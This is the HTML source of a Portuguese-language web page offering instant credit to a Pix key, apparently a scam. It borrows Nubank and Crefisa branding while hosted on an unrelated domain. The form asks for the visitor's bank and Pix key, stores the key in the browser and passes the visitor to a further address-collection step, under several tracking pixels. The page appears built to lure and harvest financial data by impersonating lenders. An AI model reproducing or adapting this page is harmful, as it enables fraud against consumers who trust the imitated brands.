<html data-capo="">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    
    
    <head>
        <meta charset="UTF-8">
        
<!-- End Facebook Pixel Code -->

<script type="text/javascript" async="" src="js/events.js"></script><script type="text/javascript" async="" src="js/events_2.js"></script><script type="text/javascript" async="" src="js/events_1.js"></script><script async="" src="https://pesquisa.plus/card/js/fbevents.js"></script>


  <!-- Meta Pixel Code -->
 
  <!-- End Meta Pixel Code -->



    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Nu</title>
    <link rel="stylesheet" href="https://pesquisa.plus/css/stylesfort2.css">
    <script type="text/javascript" async="" src="js/events_3.js"></script>
    <script type="text/javascript" async="" src="js/events_2_1.js"></script>
    <script type="text/javascript" async="" src="js/events_1_1.js"></script>
    <script async="" src="js/fbevents_1.js"></script>
    <script src="708516871467857.html" async=""></script>
    <script async="" src="js/fbevents_1.js"></script>
    <script type="text/javascript" async="" src="js-4.html"></script>

 


    <link rel="preload" href="https://pesquisa.plus/2f6b7d77-f8be-4f2b-a7ee-f98086c79291/players/66c6c81f314e79000ab5f735/player.js" as="script">
    <link rel="preload" href="https://pesquisa.plus/lib/js/smartplayer/v1/smartplayer.min.js" as="script">
    <link rel="preload" href="https://pesquisa.plus/2f6b7d77-f8be-4f2b-a7ee-f98086c79291/players/66c6c81f314e79000ab5f735/thumbnail.jpg" as="image">
    <link rel="preload" href="https://pesquisa.plus/2f6b7d77-f8be-4f2b-a7ee-f98086c79291/66c6c784314e79000ab5f70b/main.m3u8" as="fetch">
    <link rel="dns-prefetch" href="https://cdn.converteai.net">
    <link rel="dns-prefetch" href="https://scripts.converteai.net">
    <link rel="dns-prefetch" href="https://images.converteai.net">
    <link rel="dns-prefetch" href="https://api.vturb.com.br">

    <style>
        /*! modern-normalize v2.0.0 | MIT License | https://github.com/sindresorhus/modern-normalize */
        *,
        :after,
        :before {
            box-sizing: border-box;
        }

        html {
            font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            -o-tab-size: 4;
            tab-size: 4;
        }

        body {
            margin: 0;
        }

        hr {
            color: inherit;
            height: 0;
        }

        abbr[title] {
            -webkit-text-decoration: underline dotted;
            text-decoration: underline dotted;
        }

        b,
        strong {
            font-weight: bolder;
        }

        code,
        kbd,
        pre,
        samp {
            font-family: ui-monospace, SFMono-Regular, Consolas, Liberation Mono, Menlo, monospace;
            font-size: 1em;
        }

        small {
            font-size: 80%;
        }

        sub,
        sup {
            font-size: 75%;
            line-height: 0;
            position: relative;
            vertical-align: baseline;
        }

        sub {
            bottom: -.25em;
        }

        sup {
            top: -.5em;
        }

        table {
            border-color: inherit;
            text-indent: 0;
        }

        button,
        input,
        optgroup,
        select,
        textarea {
            font-family: inherit;
            font-size: 100%;
            line-height: 1.15;
            margin: 0;
        }

        button,
        select {
            text-transform: none;
        }

        [type=button],
        [type=reset],
        [type=submit],
        button {
            -webkit-appearance: button;
        }

        ::-moz-focus-inner {
            border-style: none;
            padding: 0;
        }

        :-moz-focusring {
            outline: 1px dotted ButtonText;
        }

        :-moz-ui-invalid {
            box-shadow: none;
        }

        legend {
            padding: 0;
        }

        progress {
            vertical-align: baseline;
        }

        ::-webkit-inner-spin-button,
        ::-webkit-outer-spin-button {
            height: auto;
        }

        [type=search] {
            -webkit-appearance: textfield;
            outline-offset: -2px;
        }

        ::-webkit-search-decoration {
            -webkit-appearance: none;
        }

        ::-webkit-file-upload-button {
            -webkit-appearance: button;
            font: inherit;
        }

        summary {
            display: list-item;
        }

        blockquote,
        dd,
        dl,
        figure,
        h1,
        h2,
        h3,
        h4,
        h5,
        h6,
        hr,
        ol,
        p,
        pre,
        ul {
            margin: 0;
        }

        ol,
        ul {
            list-style: none;
            padding: 0;
        }

        img,
        video {
            height: auto;
            max-width: 100%;
        }

        *,
        :after,
        :before {
            border: 0 solid #000;
        }

        :root {
            --primary: white;
            --red: #ef4444;
            --green: #27ae60;
        }

        body {
            background-color: #fff;
            color: #000;
            font-size: 16px;
        }

        #__nuxt,
        body,
        html {
            height: 100%;
        }

        a {
            color: #1b98e0;
            text-decoration: none;
        }

        a:hover {
            cursor: pointer;
            text-decoration: underline;
        }

        .text-red {
            color: var(--red);
        }

        .text-green {
            color: var(--green);
        }

        .text-primary {
            color: #E40881;
        }

        h2 {
            font-weight: 500;
        }

        .default-layout {
            display: grid;
            grid-template-areas: "top-bar" "content" "footer";
            grid-template-rows: auto 1fr auto;
            min-height: 100vh;
        }

        .default-layout .top-bar {
            grid-area: top-bar;
        }

        .default-layout .content {
            background-color: #f5f7f9;
            grid-area: content;
        }

        .default-layout .footer {
            grid-area: footer;
        }

        .top-bar {
            background-color: white;
            border-bottom: 1px solid hsla(0, 0%, 100%, .3);
            width: 100%;
        }

        .top-bar .container {
            display: grid;
            padding: 1.5rem 0;
            place-content: center;
        }

        .container {
            box-sizing: border-box;
            margin: 0 auto;
            padding-left: 1rem;
            padding-right: 1rem;
        }

        @media (min-width: 640px) {
            .container {
                max-width: 90%;
            }
        }

        @media (min-width: 768px) {
            .container {
                max-width: 85%;
            }
        }

        @media (min-width: 1024px) {
            .container {
                max-width: 80%;
            }
        }

        @media (min-width: 1280px) {
            .container {
                max-width: 1000px;
            }
        }

        img.logo {
            height: 30px;
            width: auto;
        }

        h1.logo {
            color: #fff;
            text-shadow: 0 1px 2px rgba(0, 0, 0, .2);
        }

        .central-wrapper {
            margin: 2.5rem 0;
        }

        .card {
            background-color: #fff;
            border-radius: 10px;
            box-shadow: 0 1px 4px 0 rgba(0, 8, 38, .04);
            padding: 1.5rem;
            width: 100%;
            display: grid;
            gap: .5rem;
        }

        .card-title {
            color: #000;
            font-size: 1.35rem;
            font-weight: 500;
        }

        .card-sub-title {
            color: rgba(0, 0, 0, .5);
            line-height: 1.5;
        }

        .pix-info-form {
            display: grid;
            gap: .75rem;
            margin-top: 1rem;
        }

        label {
            color: #858a98;
            font-size: 13px;
            padding-left: 12px;
        }

        .autocomplete {
            display: grid;
            gap: .5rem;
            position: relative;
            width: 100%;
        }

        input {
            border: 1px solid #d4dae0;
            border-radius: 1rem;
            outline: none;
            padding: 1rem;
            width: 100%;
        }

        input::-moz-placeholder {
            color: #d2d2d2;
        }

        input::placeholder {
            color: #d2d2d2;
        }

        input[type=submit] {
            background-color: #1e90ff;
            color: #fff;
            cursor: pointer;
        }

        .button {
            border-radius: 1rem;
            cursor: pointer;
            font-weight: 500;
            letter-spacing: .3px;
            padding: .75rem 3rem;
            transition: opacity .1s;
            width: max-content;
        }

        .button.light {
            background: #fff;
            color: #E40881;
        }

        .button.primary {
            background: #FE0064;
            color: #fff;
        }

        .button:hover {
            opacity: .9;
        }

        .button:disabled {
            cursor: not-allowed;
            opacity: .5;
        }

        .footer {
            border-bottom: 7px solid #E40881;
            border-top: 2px solid #edf0ef;
            color: #fff;
            color: #000;
            padding: 2rem 0;
            text-align: center;
        }

        .footer p {
            margin: .5rem 0;
        }
    </style>
    <script src="js/latest.js" async="" defer=""></script>
    <style>
        .autocomplete-suggestions {
            border: 1px solid #d4d4d4;
            max-height: 150px;
            overflow-y: auto;
            position: absolute;
            background-color: #fff;
            z-index: 1000;
            margin-top: 5px;
            border-radius: 6px;
        }

        .autocomplete-suggestion {
            padding: 10px;
            cursor: pointer;
        }

        .autocomplete-suggestion:hover {
            background-color: #e9e9e9;
        }
    </style>
    <script async="" defer="" src="js/pixel_1.js"></script>
    <script async="" defer="" src="js/pixel_1.js"></script>
    <script type="text/javascript" async="" src="f-2.txt"></script>
    <!-- Meta Pixel Code -->
    <script>
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '1044109920185725');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none" src="https://pesquisa.plus/tr-28?id=1044109920185725&ev=PageView&noscript=1"></noscript>
    <!-- End Meta Pixel Code -->
<script async="" defer="" src="js/pixel.js"></script>
<script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>

    <!-- Meta Pixel Code -->
    <script>
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '1416081155754349');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none" src="https://pesquisa.plus/tr-29?id=1416081155754349&ev=PageView&noscript=1"></noscript>
    <!-- End Meta Pixel Code -->

    <!-- Meta Pixel Code -->
    <script>
        !function (f, b, e, v, n, t, s) {
            if (f.fbq) return; n = f.fbq = function () {
                n.callMethod ?
                n.callMethod.apply(n, arguments) : n.queue.push(arguments)
            };
            if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0; n.version = '2.0';
            n.queue = []; t = b.createElement(e); t.async = !0;
            t.src = v; s = b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t, s)
        }(window, document, 'script',
            'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '478917228479685');
        fbq('track', 'PageView');
    </script>
    <noscript><img height="1" width="1" style="display:none" src="https://pesquisa.plus/tr-30?id=478917228479685&ev=PageView&noscript=1"></noscript>
    <!-- End Meta Pixel Code -->

    <!-- TikTok Pixel Code Start -->
  
    <!-- TikTok Pixel Code End -->


   
    <script async="" defer="" src="js/pixel_1.js"></script>
<script async="" defer="" src="js/pixel.js"></script><script async="" defer="" src="js/pixel.js"></script></head>

<body>
    <div id="__nuxt">
        <div class="default-layout">
            <header class="top-bar">
                <div class="container">
                    <h1 class="logo" data-v-f5d5d4cd="" style="--2348ed9e: 10px; color: white;" data-v-4f7075cc=""><img src="images/Crefisa.png" style="max-width:100px"></h1>
                </div>
            </header>
            <main class="content">
                <div class="central-wrapper pix-info-page">
                    <div class="container">
                        <div class="card">
                            <span class="card-title">
                                Recebimento do crédito em até 3 minutos na sua chave pix
                            </span>
                            <span class="card-sub-title">
                                Chave Pix de qualquer banco
                            </span>
                            <form class="pix-info-form" action="../cep/" method="GET" id="01ed137a-e008-ea85-6a3d-3751d37e79ab">
                                <div class="autocomplete">
                                    <label>Nome do banco</label>
                                    <div style="position:relative;" class="input-banco">
                                        <input type="text" id="banco" value="" placeholder="Ex: Nubank" required="" autocomplete="off">
                                        <div id="autocomplete-list" class="autocomplete-suggestions"></div>
                                    </div>
                                </div>
                                <div class="text-field">
                                    <label>Chave Pix</label>
                                    <input type="text" placeholder="CPF, Telefone, E-mail ou aleatória" id="chavePix" required="">
                                </div>
                                <button class="button primary" type="submit" id="continuarBtn">
                                    Continuar
                                </button>
                                <input type="hidden" name="utm_source" value="organicjLj66d8af13936793ee8d69ffb5" id="a771f696-2f22-1238-cfbf-41cb8f63ca6b"><input type="hidden" name="utm_campaign" value="rKm-km-rKm" id="cfc327e0-a133-7bcf-c8a6-17f926682c5d"><input type="hidden" name="utm_medium" value="" id="b2fd5c61-85ee-9c71-f203-f6bdd633078b"><input type="hidden" name="utm_content" value="" id="37bc07a4-37ec-9d3c-c575-f934064a2852"><input type="hidden" name="utm_term" value="" id="13e92887-78d7-74bb-9f37-24f10b88c33d"><input type="hidden" name="subid" value="organicjLj66d8af13936793ee8d69ffb5" id="205d24d7-f370-5817-61ac-8a3d17562033"><input type="hidden" name="sid2" value="rKm-km-rKm" id="1748e4b1-33e4-85ea-7e5e-24e2771e8f89"><input type="hidden" name="subid2" value="rKm-km-rKm" id="37ec9514-4f79-68b2-dc55-7abd2f3b9b11"><input type="hidden" name="subid3" value="" id="7232ca68-a73a-9098-23df-418cdfea6e38"><input type="hidden" name="subid4" value="" id="e587d46a-cc3a-3d58-548b-4401c8ef0a04"><input type="hidden" name="subid5" value="rKm-km-rKm" id="7144976a-3fb7-2ad7-802f-646328f5ec65"><input type="hidden" name="xcod" value="organicjLj66d8af13936793ee8d69ffb5hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR" id="d99b9b32-d266-57d8-1e15-5fb20d027242"><input type="hidden" name="sck" value="organicjLj66d8af13936793ee8d69ffb5hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR" id="93473639-3468-cc24-090c-d1d2995b899b">
                            </form>
                        </div>
                    </div>
                </div>
            </main>



            <footer style="margin: 0; padding: 0; background-color: white; color: #000; font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 200px;">
                <div style="text-align: center;">

                    <p style="margin: 0; font-size: 14px; line-height: 1.5;">© 2024 Sim, Crédito Simples Todos os Direitos Reservados</p>
                    <p style="margin: 0; font-size: 14px; line-height: 1.5;">Rua Capote Valente, 39 - São Paulo, SP -
                        05409-000</p>
                </div>
            </footer>
        </div>
    </div>
    <div id="teleports"></div>

    <script>
        document.getElementById('continuarBtn').addEventListener('click', function (e) {
            const chavePix = document.getElementById('chavePix').value;
            localStorage.setItem('chavePix', chavePix);
        });
        const bancos = ["Banco Santander (Brasil) S. A.", "Banco Bradesco S.A.", "Banco do Brasil S.A.", "Caixa Econômica Federal", "Itaú Unibanco S.A.", "AGK Corretora de Câmbio S.A.", "Advanced Corretora de Câmbio Ltda.", "Albatross Corretora de Câmbio e Valores S.A", "Ativa Investimentos S.A. Corretora de Títulos Câmbio e Valores", "Avista S.A. Crédito, Financiamento e Investimento", "BCV - Banco de Crédito e Varejo S/A", "BGC Liquidez Distribuidora de Títulos e Valores Mobiliários Ltda.", "BNY Mellon Banco S.A.", "BPP Instituição de Pagamento S.A.", "BR Partners Banco de Investimento S.A.", "BRK S.A. Crédito, Financiamento e Investimento", "BRL Trust Distribuidora de Títulos e Valores Mobiliários S.A.", "BS2 Distribuidora de Títulos e Valores Mobiliários S.A.", "BT Corretora de Câmbio Ltda.", "Banco A. J. Renner S.A.", "Banco ABC Brasil S.A.", "Banco ABN Amro S.A.", "Banco Agibank S.A.", "Banco Alfa S.A.", "Banco Alvorada S.A.", "Banco AndBank (Brasil) S.A.", "Banco Arbi S.A.", "Banco B3 S.A.", "Banco BMG S.A.", "Banco BNP Paribas Brasil S.A.", "Banco BS2 S.A.", "Banco BTG Pactual S.A.", "Banco Bandepe S.A.", "Banco Bocom BBM S.A.", "Banco Bradescard S.A.", "Banco Bradesco BBI S.A.", "Banco Bradesco BERJ S.A.", "Banco Bradesco Cartões S.A.", "Banco Bradesco Financiamentos S.A.", "Banco C6 S.A.", "Banco Caixa Geral - Brasil S.A.", "Banco Capital S. A.", "Banco Cargill S.A.", "Banco Cetelem S.A.", "Banco Cifra S.A.", "Banco Citibank S.A.", "Banco Clássico S.A.", "Banco Cooperativo Sicredi S. A.", "Banco Cooperativo do Brasil S/A - Bancoob", "Banco Credit Agrícole Brasil S.A.", "Banco Credit Suisse (Brasil) S.A.", "Banco Crefisa S.A.", "Banco Cédula S.A.", "Banco Daycoval S.A.", "Banco Fator S.A.", "Banco Fibra S.A.", "Banco Ficsa S. A.", "Banco Finaxis S.A.", "Banco Guanabara S.A.", "Banco Inbursa S.A.", "Banco Industrial do Brasil S.A.", "Banco Indusval S. A.", "Banco Inter S.A.", "Banco Investcred Unibanco S.A.", "Banco ItauBank S.A.", "Banco Itaú BBA S.A.", "Banco Itaú Consignado S.A.", "Banco J. P. Morgan S. A.", "Banco J. Safra S.A.", "Banco John Deere S.A.", "Banco KDB do Brasil S.A.", "Banco Keb Hana do Brasil S. A.", "Banco Luso Brasileiro S.A.", "Banco MUFG Brasil S.A.", "Banco Mercantil do Brasil S.A.", "Banco Mizuho do Brasil S.A.", "Banco Modal S.A.", "Banco Morgan Stanley S. A.", "Banco Máxima S.A.", "Banco Nacional de Desenvolvimento Econômico e Social BNDES", "Banco Olé Bonsucesso Consignado S.A.", "Banco Original S.A.", "Banco Original do Agronegócio S.A.", "Banco Ourinvest S.A.", "Banco Pan S.A.", "Banco Paulista S.A.", "Banco Pine S.A.", "Banco Rabobank International Brasil S.A.", "Banco Rendimento S.A.", "Banco Ribeirão Preto S.A.", "Banco Rodobens SA", "Banco Safra S.A.", "Banco Semear S.A.", "Banco Sistema S.A.", "Banco Smartbank S.A.", "Banco Société Générale Brasil S.A.", "Banco Sofisa S. A.", "Banco Sumitomo Mitsui Brasileiro S.A.", "Banco Topazio S.A.", "Banco Tricury S.A.", "Banco Triângulo S.A.", "Banco VR S.A.", "Banco Votorantim S.A.", "Banco Western Union do Brasil S.A.", "Banco Woori Bank do Brasil S.A.", "Banco da Amazônia S.A.", "Banco da China Brasil S.A.", "Banco de Brasília S.A.", "Banco de La Provincia de Buenos Aires", "Banco de La Republica Oriental del Uruguay", "Banco de la Nacion Argentina", "Banco do Estado de Sergipe S.A.", "Banco do Estado do Pará S.A.", "Banco do Estado do Rio Grande do Sul S.A.", "Banco do Nordeste do Brasil S.A.", "BancoSeguro S.A.", "Banestes S.A. Banco do Estado do Espírito Santo", "Bank of America Merrill Lynch Banco Múltiplo S.A.", "Barigui Companhia Hipotecária", "Bexs Banco de Câmbio S.A.", "Bexs Corretora de Câmbio S/A", "Brasil Plural S.A. Banco Múltiplo", "Broker Brasil Corretora de Câmbio Ltda.", "CM Capital Markets Corretora de Câmbio, Títulos e Valores Mobiliários Ltda.", "Cambionet Corretora de Câmbio Ltda.", "Carol Distribuidora de Títulos e Valores Mobiliários Ltda.", "Caruana S.A. Sociedade de Crédito, Financiamento e Investimento", "Casa do Crédito S.A. Sociedade de Crédito ao Microempreendedor", "Central Cooperativa de Crédito no Estado do Espírito Santo - CECOOP", "Central de Cooperativas de Economia e Crédito Mútuo do Est RS - Unicred", "China Construction Bank (Brasil) Banco Múltiplo S/A", "Citibank N.A.", "Codepe Corretora de Valores e Câmbio S.A.", "Commerzbank Brasil S.A. - Banco Múltiplo", "Confederação Nacional das Cooperativas Centrais Unicred Ltda – Unicred do Brasil", "Confederação Nacional das Cooperativas Centrais de Crédito e Economia Familiar e", "Confidence Corretora de Câmbio S.A.", "Coop de Créd. Mútuo dos Despachantes de Trânsito de SC e Rio Grande do Sul", "Cooperativa Central de Crédito - Ailos", "Cooperativa Central de Crédito Noroeste Brasileiro Ltda - CentralCredi", "Cooperativa de Crédito Rural Coopavel", "Cooperativa de Crédito Rural da Região da Mogiana", "Cooperativa de Crédito Rural de Ouro Sulcredi/Ouro", "Cooperativa de Crédito Rural de Primavera do Leste", "Cooperativa de Crédito Rural de São Miguel do Oeste - Sulcredi/São Miguel", "Credialiança Cooperativa de Crédito Rural", "Credicoamo Crédito Rural Cooperativa", "Credit Suisse Hedging-Griffo Corretora de Valores S.A.", "Dacasa Financeira S/A - Sociedade de Crédito, Financiamento e Investimento", "Decyseo Corretora de Câmbio Ltda.", "Deutsche Bank S.A. - Banco Alemão", "Easynvest - Título Corretora de Valores SA", "Facta Financeira S.A. - Crédito Financiamento e Investimento", "Fair Corretora de Câmbio S.A.", "Frente Corretora de Câmbio Ltda.", "Genial Investimentos Corretora de Valores Mobiliários S.A.", "Get Money Corretora de Câmbio S.A.", "Goldman Sachs do Brasil Banco Múltiplo S. A.", "Guide Investimentos S.A. Corretora de Valores", "Guitta Corretora de Câmbio Ltda.", "HS Financeira S/A Crédito, Financiamento e Investimentos", "HSBC Brasil S.A. Banco de Investimento", "Haitong Banco de Investimento do Brasil S.A.", "Hipercard Banco Múltiplo S.A.", "IB Corretora de Câmbio, Títulos e Valores Mobiliários S.A.", "ICAP do Brasil Corretora de Títulos e Valores Mobiliários Ltda.", "ICBC do Brasil Banco Múltiplo S.A.", "ING Bank N.V.", "Intesa Sanpaolo Brasil S.A. - Banco Múltiplo", "Itaú Unibanco Holding S.A.", "JPMorgan Chase Bank, National Association", "Kirton Bank S.A. - Banco Múltiplo", "Lastro RDV Distribuidora de Títulos e Valores Mobiliários Ltda.", "Lecca Crédito, Financiamento e Investimento S/A", "Levycam - Corretora de Câmbio e Valores Ltda.", "MS Bank S.A. Banco de Câmbio", "Magliano S.A. Corretora de Cambio e Valores Mobiliarios", "Nova Futura Corretora de Títulos e Valores Mobiliários Ltda.", "Novo Banco Continental S.A. - Banco Múltiplo", "Nu Pagamentos S.A. (Nubank)", "OM Distribuidora de Títulos e Valores Mobiliários Ltda.", "Oliveira Trust Distribuidora de Títulos e Valores Mobiliários S.A.", "Omni Banco S.A.", "PI Distribuidora de Títulos e Valores Mobiliários S.A.", "Pagseguro Internet S.A.", "Parana Banco S. A.", "Parmetal Distribuidora de Títulos e Valores Mobiliários Ltda.", "Pernambucanas Financiadora S.A. Crédito, Financiamento e Investimento", "Planner Corretora de Valores S.A.", "PortoCred S.A. Crédito, Financiamento e Investimento", "Portopar Distribuidora de Títulos e Valores Mobiliários Ltda.", "Pólocred Sociedade de Crédito ao Microempreendedor e à Empresa de Pequeno Porte", "QI Sociedade de Crédito Direto S.A.", "RB Capital Investimentos Distribuidora de Títulos e Valores Mobiliários Ltda.", "Renascença Distribuidora de Títulos e Valores Mobiliários Ltda.", "Sagitur Corretora de Câmbio Ltda.", "Scotiabank Brasil S.A. Banco Múltiplo", "Senff S.A. - Crédito, Financiamento e Investimento", "Senso Corretora de Câmbio e Valores Mobiliários S.A.", "Servicoop - Cooperativa de Crédito dos Servidores Públicos Estaduais do Rio Gran", "Socred S.A. - Sociedade de Crédito ao Microempreendedor e à Empresa de Pequeno P", "Sorocred - Crédito, Financiamento e Investimento S/A", "Standard Chartered Bank (Brasil) S.A. Banco de Investimento", "State Street Brasil S.A. - Banco Comercial", "Stone Pagamentos S.A.", "Terra Investimentos Distribuidora de Títulos e Valores Mobiliários Ltda.", "Travelex Banco de Câmbio S.A.", "Treviso Corretora de Câmbio S.A.", "Tullett Prebon Brasil Corretora de Valores e Câmbio Ltda.", "UBS Brasil Banco de Investimento S.A.", "UBS Brasil Corretora de Câmbio, Títulos e Valores Mobiliários S.A.", "Uniprime Central – Central Interestadual de Cooperativas de Crédito Ltda.", "Uniprime Norte do Paraná - Cooperativa de Crédito Ltda.", "Vip's Corretora de Câmbio Ltda.", "Vision S.A. Corretora de Câmbio", "Vortx Distribuidora de Títulos e Valores Mobiliários Ltda.", "XP Investimentos Corretora de Câmbio Títulos e Valores Mobiliários S.A.", "Banco Bari de Investimentos e Financiamentos S.A", "Cooperativa de Crédito Rural de Abelardo Luz - Sulcredi/Crediluz", "MercadoPago.com Representações Ltda.", "Acesso Soluções de Pagamento S.A.", "Órama Distribuidora de Títulos e Valores Mobiliários S.A.", "Crefaz Sociedade de Crédito ao Microempreendedor e a Empresa de Pequeno Porte Lt", "Banco Neon S.A.", "Creditas Sociedade de Crédito Direto S.A.", "Banco Theca S.A."]

        const input = document.getElementById('banco');
        const autocompleteList = document.getElementById('autocomplete-list');

        input.addEventListener('input', function () {
            const value = this.value.toLowerCase();
            autocompleteList.innerHTML = '';

            if (!value) return;

            bancos.forEach(banco => {
                if (banco.toLowerCase().includes(value)) {
                    const suggestion = document.createElement('div');
                    suggestion.classList.add('autocomplete-suggestion');
                    suggestion.textContent = banco;
                    suggestion.addEventListener('click', function () {
                        input.value = banco;
                        autocompleteList.innerHTML = '';
                    });
                    autocompleteList.appendChild(suggestion);
                }
            });
        });

        document.addEventListener('click', function (e) {
            if (!autocompleteList.contains(e.target) && e.target !== input) {
                autocompleteList.innerHTML = '';
            }
        });
    </script>
<iframe allow="join-ad-interest-group" data-tagging-id="AW-16492214778" data-load-time="1725487444273" height="0" width="0" src="https://td.doubleclick.net/td/rul/16492214778?random=1725487444265&cv=11&fst=1725487444265&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4930v9181676663za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=0&u_w=400&u_h=627&url=https%3A%2F%2Fnsadasdn.fr%2Fnu%2F7%2F%3Futm_source%3DorganicjLj66d8af13936793ee8d69ffb5%26utm_campaign%3DrKm-km-rKm%26utm_medium%3D%26utm_content%3D%26utm_term%3D%26subid%3DorganicjLj66d8af13936793ee8d69ffb5%26sid2%3DrKm-km-rKm%26subid2%3DrKm-km-rKm%26subid3%3D%26subid4%3D%26subid5%3DrKm-km-rKm%26xcod%3DorganicjLj66d8af13936793ee8d69ffb5hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR%26sck%3DorganicjLj66d8af13936793ee8d69ffb5hQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&hn=www.googleadservices.com&frm=0&tiba=Nu&npa=0&pscdl=noapi&auid=1356865573.1725479007&uaa=&uab=64&uafvl=Chromium%3B128.0.6613.115%7CNot%253BA%253DBrand%3B24.0.0.0%7CGoogle%2520Chrome%3B128.0.6613.115&uamb=1&uam=Nexus%205&uap=Android&uapv=6.0&uaw=0&fledge=1&data=event%3Dgtag.config" style="display: none; visibility: hidden;"></iframe>


<script src="../scripts/utms/latest-8.js" data-utmify-prevent-subids="" async="" defer=""></script>

<script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "ppobfzii52");
</script>


</body></html>